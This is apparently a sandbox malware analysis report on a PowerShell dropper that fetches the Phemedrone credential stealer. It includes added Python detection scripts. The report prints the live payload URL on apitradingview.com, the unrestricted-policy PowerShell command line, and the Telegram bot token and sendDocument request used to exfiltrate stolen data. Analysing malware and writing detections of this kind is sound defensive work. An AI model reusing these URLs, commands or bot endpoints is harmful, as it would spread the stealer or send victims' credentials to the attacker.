Windows Analysis Report
upd.ps1

Overview

General Information

Sample name: upd.ps1
Analysis ID: 1548283
MD5: 901388115be5c8209d83642d8d5d9b51
SHA1: d2293a97b9772328bb60e822027063deffba0c4d
SHA256: b54e7cd114b771b8b81e8c9b461ab611c3a5fddc575bdf1da132f5863c5d1e72
Tags: apitradingview-com, ps1, user-JAMESWT_MHT

Detection

Phemedrone Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
AI detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7300, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7324, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WDSecureUtility_594.exe (PID: 7560, cmdline: "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y, MD5: 0FF0576F91E4F548CA0D223462B2586C)
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
00000003.00000002.1534247487.0000027400242000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000003.00000002.1535729203.00000274100C6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
(6 further entries not shown in this extract)

System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", ProcessId: 7300, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7300, TargetFilename: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1", ProcessId: 7300, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T09:42:32.976382+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49708 | TCP
2024-11-04T09:43:13.139898+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.8 | 49713 | TCP
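The two Sigma matches in this section key on the same pair of events: a powershell.exe start carrying -ExecutionPolicy unrestricted, and that process (PID 7300) writing WDSecureUtility_594.exe into AppData\Roaming. The following is an added example, not part of this Joe Sandbox report and not the upstream Sigma rule bodies: it approximates both rules' logic in Python, runs it over process-creation and file-creation events rebuilt from the Data fields above, and then chains the drop to the later execution of the dropped file. The regex, the extension list, the ParentProcessId of the dropped binary (read off the process tree) and the benign control event are my assumptions.

```python
import re

# Sysmon-style events rebuilt from the report's Sigma "Data" fields (EventID 1 = process
# creation, EventID 11 = file creation). ParentProcessId 7300 for the dropped binary is
# taken from the report's process tree. The last event is a constructed benign control.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe"
EVENTS = [
    {"EventID": 1, "ProcessId": 7300, "ParentProcessId": 4084, "Image": PS,
     "CommandLine": f'"{PS}" -noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\upd.ps1"'},
    {"EventID": 11, "ProcessId": 7300, "Image": PS, "TargetFilename": DROPPED},
    {"EventID": 1, "ProcessId": 7560, "ParentProcessId": 7300, "Image": DROPPED,
     "CommandLine": f'"{DROPPED}" -pkek -aoa -y'},
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 900, "Image": PS,  # constructed, benign
     "CommandLine": f'"{PS}" -NoProfile -File C:\\scripts\\backup.ps1'},
]

PS_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
# My approximation of "Change PowerShell Policies to an Insecure Level": an execution-policy
# switch (including PowerShell's abbreviations such as -ep, -ex, -exec) or Set-ExecutionPolicy,
# followed by an insecure value.
INSECURE_POLICY = re.compile(r"(?i)(?:set-executionpolicy|-e[a-z]*)\s+(unrestricted|bypass)\b")
# My approximation of "Potential Binary Or Script Dropper Via PowerShell": a PowerShell image
# writing a file with an executable or script extension (Sysmon EventID 11).
DROPPER_EXTENSIONS = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".scr")


def is_powershell(image: str) -> bool:
    return image.lower().endswith(PS_IMAGES)


def rule_insecure_execution_policy(ev: dict):
    if ev.get("EventID") != 1 or not is_powershell(ev.get("Image", "")):
        return None
    m = INSECURE_POLICY.search(ev.get("CommandLine", ""))
    if not m:
        return None
    return {"rule": "Change PowerShell Policies to an Insecure Level",
            "pid": ev["ProcessId"], "evidence": m.group(0)}


def rule_dropper_via_powershell(ev: dict):
    if ev.get("EventID") != 11 or not is_powershell(ev.get("Image", "")):
        return None
    target = ev.get("TargetFilename", "")
    if not target.lower().endswith(DROPPER_EXTENSIONS):
        return None
    return {"rule": "Potential Binary Or Script Dropper Via PowerShell",
            "pid": ev["ProcessId"], "evidence": target}


RULES = (rule_insecure_execution_policy, rule_dropper_via_powershell)


def run_rules(events):
    """Apply every rule to every event; return the list of hits in event order."""
    hits = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                hits.append(hit)
    return hits


def correlate_drop_and_exec(events, hits):
    """Chain a dropper hit to its payload: the dropped path later appears as the Image of a
    process whose parent is the dropping PowerShell PID. Returns those executed paths."""
    dropped = {(h["pid"], h["evidence"].lower()) for h in hits if "Dropper" in h["rule"]}
    executed = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        if (ev.get("ParentProcessId"), ev.get("Image", "").lower()) in dropped:
            executed.append(ev["Image"])
    return executed


if __name__ == "__main__":
    found = run_rules(EVENTS)
    for h in found:
        print(f"[{h['rule']}] pid={h['pid']} evidence={h['evidence']}")
    print("dropped-and-executed:", correlate_drop_and_exec(EVENTS, found))
```

Both true positives fire and the benign control does not. The correlation step is what a practitioner actually wants: an EventID 11 dropper hit followed by a process start whose parent is the dropping PID turns two medium-confidence Sigma matches into one high-confidence "PowerShell dropped and ran a PE" finding, which is exactly the chain the process tree above shows.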


AV Detection

Source: https://apitradingview.com | Avira URL Cloud: Label: malware
Source: https://apitradingview.com/WDSecureUtility.exe | Avira URL Cloud: Label: malware
Source: http://apitradingview.com | Avira URL Cloud: Label: malware
Source: :newads (copy) | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Code function: 3_2_00007FFB4B4FFCE2 CryptUnprotectData
Source: unknown | HTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1 | Host: get.geojs.io | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 86.104.15.60
Source: Joe Sandbox View | IP Address: 172.67.70.233
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49713
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49708
Source: global traffic | HTTP traffic detected: GET /WDSecureUtility.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: apitradingview.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 | Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332ca | Host: api.telegram.org | Content-Length: 239842 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /WDSecureUtility.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: apitradingview.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1 | Host: get.geojs.io | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: apitradingview.com
Source: global traffic | DNS traffic detected: DNS query: get.geojs.io
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600 | Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332ca | Host: api.telegram.org | Content-Length: 239842 | Expect: 100-continue | Connection: Keep-Alive
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000000.00000002.1559813700.000001B18165B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://apitradingview.com
Source: powershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1559813700.000001B181B0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000000.00000002.1559813700.000001B180001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument
Source: powershell.exe, 00000000.00000002.1559813700.000001B181633000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apitradingview.com
Source: powershell.exe, 00000000.00000002.1559813700.000001B181633000.00000004.00000800.00020000.00000000.sdmp, upd.ps1 | String found in binary or memory: https://apitradingview.com/WDSecureUtility.exe
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: powershell.exe, 00000000.00000002.1559813700.000001B180233000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1559813700.000001B180C33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1584441203.000001B1901B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1584441203.000001B19006E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/TheDyer
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400001000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.000002740038B000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410066000.00000004.00000800.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400083000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/freakcodingspot
Source: WDSecureUtility_594.exe, 00000003.00000002.1534247487.0000027400215000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/webster480
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: WDSecureUtility_594.exe, 00000003.00000002.1535729203.0000027410268000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | HTTPS traffic detected: 86.104.15.60:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49707 version: TLS 1.2
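The three HTTP requests captured in this section tell the whole story of the sample: PowerShell fetches the payload with its default WindowsPowerShell User-Agent, the payload asks get.geojs.io for the victim's geolocation with no User-Agent at all, and it then pushes a 239,842-byte multipart upload to the Telegram Bot API sendDocument method under a spoofed Chrome 49 User-Agent. The following is an added example, not part of the Joe Sandbox report: it parses those requests (reconstructed here with their CRLF header breaks restored) and raises the findings that correspond to the report's "Uses the Telegram API", "HTTP GET or POST without a user agent" and "Uses a known web browser user agent" signatures. The finding names, the upload-size threshold and the executable-extension list are my assumptions.

```python
import re

# Requests as captured in the report's "HTTP traffic detected" entries, with the header
# line breaks (CRLF) restored; the page shows them run together on one line.
CAPTURED_REQUESTS = [
    "GET /WDSecureUtility.exe HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682\r\n"
    "Host: apitradingview.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /v1/ip/geo.json HTTP/1.1\r\nHost: get.geojs.io\r\nConnection: Keep-Alive\r\n\r\n",
    "POST /bot8091768794:AAFZsJ1h-6BiszgyLm-eH6c-uITQ7Z99Wbc/sendDocument HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600\r\n"
    "Content-Type: multipart/form-data; boundary=----------------------------8dcfc82b23332ca\r\n"
    "Host: api.telegram.org\r\nContent-Length: 239842\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n",
]

# Telegram Bot API paths are /bot<numeric bot id>:<token>/<method>.
TELEGRAM_BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>\w+)")
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".msi")
UPLOAD_THRESHOLD = 100_000  # assumption: a bot upload above this many bytes is treated as exfiltration


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.1 request head into method, path, version and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def mask_token(token: str) -> str:
    """Keep only the ends of a bot token so reports can be shared without leaking it."""
    return token[:4] + "..." + token[-4:]


def analyse(raw_requests):
    """Return (finding, host, detail) tuples for the behaviours seen in this sample."""
    findings = []
    user_agents = set()
    for raw in raw_requests:
        req = parse_request(raw)
        headers, path = req["headers"], req["path"]
        host, ua = headers.get("host", ""), headers.get("user-agent")
        if ua is None:
            findings.append(("no-user-agent", host, path))
        else:
            user_agents.add(ua)
        # PowerShell's default UA downloading a PE is the dropper stage.
        if ua and "windowspowershell" in ua.lower() and path.lower().endswith(EXECUTABLE_EXT):
            findings.append(("powershell-executable-download", host, path))
        m = TELEGRAM_BOT_PATH.match(path) if host == "api.telegram.org" else None
        if m:
            bot_id, token, api_method = m.group("bot_id", "token", "method")
            findings.append(("telegram-bot-api", host,
                             f"bot {bot_id} token {mask_token(token)} method {api_method}"))
            size = int(headers.get("content-length", "0"))
            if req["method"] == "POST" and api_method in UPLOAD_METHODS and size > UPLOAD_THRESHOLD:
                findings.append(("telegram-upload-exfil", host, f"{api_method} {size} bytes"))
    # One client presenting two different browser identities is itself a signal.
    if len(user_agents) > 1:
        findings.append(("mixed-user-agents", "", "; ".join(sorted(user_agents))))
    return findings


if __name__ == "__main__":
    for kind, host, detail in analyse(CAPTURED_REQUESTS):
        print(f"{kind:32s} {host:20s} {detail}")
```

The bot id is the part of the path before the colon; it identifies the attacker's bot even after the token is rotated, so it is the more durable IOC, whereas the full token should be handled as a credential (masked in tickets, reported to Telegram for revocation) rather than pasted into blocklists. Note that blocking api.telegram.org by hostname is usually the only network control available here, since the traffic is ordinary TLS 1.2 to legitimate Telegram infrastructure (ASN TELEGRAMRU above).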

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4B4F0F8D
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Code function: 3_2_00007FFB4B508C86
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Code function: 3_2_00007FFB4B50EB03
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Code function: 3_2_00007FFB4B50B1FA
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Code function: 3_2_00007FFB4B509A32
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Code function: 3_2_00007FFB4B4F9E0D
Source: WDSecureUtility_594.exe.0.dr, -.cs | Base64 encoded string: 'TBYRUlFZVF1ABwsFHgYPVw0WNlMHFAoDCUQJFAIoBxl0WxddGgYWU05IHhAECAYGFQ4DSw4='
Source: WDSecureUtility_594.exe.0.dr, -.cs | Base64 encoded string: 'ZHE0czA3RTINBwMQGA0nHFlRWHAhLChRNQMAQkQ2OwdYVx1FAEMyOSc4K1EmGwQWUkcLfxdDWFE='
Source: WDSecureUtility_594.exe.0.dr, -.cs | Base64 encoded string: 'VFsVGB8KBxQQHhdfHAgTDWt9FlIWGwAVJigyFx8FDioHGhFYFwYdFAYODF8aDB0QW1Aa'
Source: WDSecureUtility_594.exe.0.dr, -.cs | Base64 encoded string: '…', 'HWQQUx4GAQMNBAtRJR0OFFtRChYhBhUeEB5EUSoVSxdOFDhBFgEWBQcYWklGSU1Vd2AQUzcaAANvYGN7FgkLVRoUMWZJQx5BH0oyWQ1YFikeOXIWXkMxEAVQTgpEFEsOBEl1PFNORSEDGR0GGRsPBg0UAwIObm9RT0otHhkCAhBEDlhNRh5oe0JHTiYXBQcQQ0dCFghVGHxoCg4Re2MQQko5ck1LHmh7b2AuFwQMCh5UWxxfHQQWAQ0e'
Source: WDSecureUtility_594.exe.0.dr, -.cs | Base64 encoded string: 'YkQfRBIHAEtCHQsTBQYIHlJAdTwwDAsfBwkaGBkHUVViRB9EEgcAfGg5CxJbPg4XZFsbXRYXSDoHE1RREi4DGX58Nl4ROycCODksBBRbXh9tZUULfmk2FAFHORQUOgQWXFEMGyUGFwILBQBLVlhYeD05cg=='
Source: classification engine | Classification label: mal100.troj.spyw.evad.winPS1@4/8@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Mutant created: \Sessions\1\BaseNamedObjects\Ycanaxotybererutoxotetecugofifa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arohrkmb.100.ps1
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
